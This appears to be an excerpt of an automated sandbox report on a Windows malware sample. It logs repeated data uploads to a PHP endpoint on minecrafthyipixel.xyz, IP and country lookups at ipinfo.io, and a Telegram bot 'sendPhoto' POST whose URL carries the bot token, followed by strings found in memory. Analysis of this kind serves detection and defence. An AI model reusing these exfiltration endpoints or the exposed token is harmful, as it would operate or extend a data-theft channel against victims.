                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----SKVkDmmIXvVPlbJZk2vuH9rP9KPHZ1VSviUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 147982Expect: 100-continueConnection: Keep-Alive
                          Source: global traffic
                          HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                          Content-Type: application/octet-stream
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                          Host: minecrafthyipixel.xyz
                          Content-Length: 2172
                          Expect: 100-continue
                          Connection: Keep-Alive
                          Source: global traffic
                          HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                          Content-Type: application/octet-stream
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                          Host: minecrafthyipixel.xyz
                          Content-Length: 2180
                          Expect: 100-continue
                          Connection: Keep-Alive
                          Source: global traffic
                          HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                          Content-Type: application/octet-stream
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                          Host: minecrafthyipixel.xyz
                          Content-Length: 2192
                          Expect: 100-continue
                          Connection: Keep-Alive
                          Source: global traffic
                          HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                          Content-Type: application/octet-stream
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                          Host: minecrafthyipixel.xyz
                          Content-Length: 2504
                          Expect: 100-continue
                          Connection: Keep-Alive
                          Source: global traffic
                          HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                          Content-Type: application/octet-stream
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                          Host: minecrafthyipixel.xyz
                          Content-Length: 2504
                          Expect: 100-continue
                          Source: global traffic
                          HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                          Content-Type: application/octet-stream
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                          Host: minecrafthyipixel.xyz
                          Content-Length: 2500
                          Expect: 100-continue
                          Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2192Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global traffic, HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2192 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic, HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
                          Source: global traffic, HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2172 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic, HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2180 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic, HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2504 Expect: 100-continue
                          Source: global traffic, HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2500 Expect: 100-continue Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2180Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2192Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2164 Expect: 100-continue Connection: Keep-Alive
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
                          Source: unknownDNS traffic detected: queries for: ipinfo.io
                          Source: unknown HTTP traffic detected: POST /bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="375a82a9-434c-43d0-8d25-c0ccd816cce2" Host: api.telegram.org Content-Length: 100984 Expect: 100-continue Connection: Keep-Alive
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.000000000384B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                          Source: powershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                          Source: powershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                          Source: powershell.exe, 00000017.00000002.3244330908.000002B847530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                          Source: powershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1826108573.000002B82F3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC3791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A7570E1000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.0000000003AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: powershell.exe, 00000017.00000002.1826108573.000002B82F3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC3791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A7570E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
